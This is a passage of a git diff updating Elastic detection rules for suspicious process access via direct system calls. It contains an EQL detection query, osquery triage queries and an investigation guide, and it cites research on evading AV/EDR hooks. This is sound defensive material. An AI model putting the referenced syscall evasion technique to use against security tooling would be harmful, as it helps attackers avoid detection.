a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_105.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_105.json index fbeeb3fe179..19d4c660e22 100644 --- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_105.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_106.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_106.json index 8ecdb2de074..3a0bc621ae3 100644 --- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_106.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_107.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_107.json index 431c0b3c25d..a216073adec 100644 --- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_107.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is 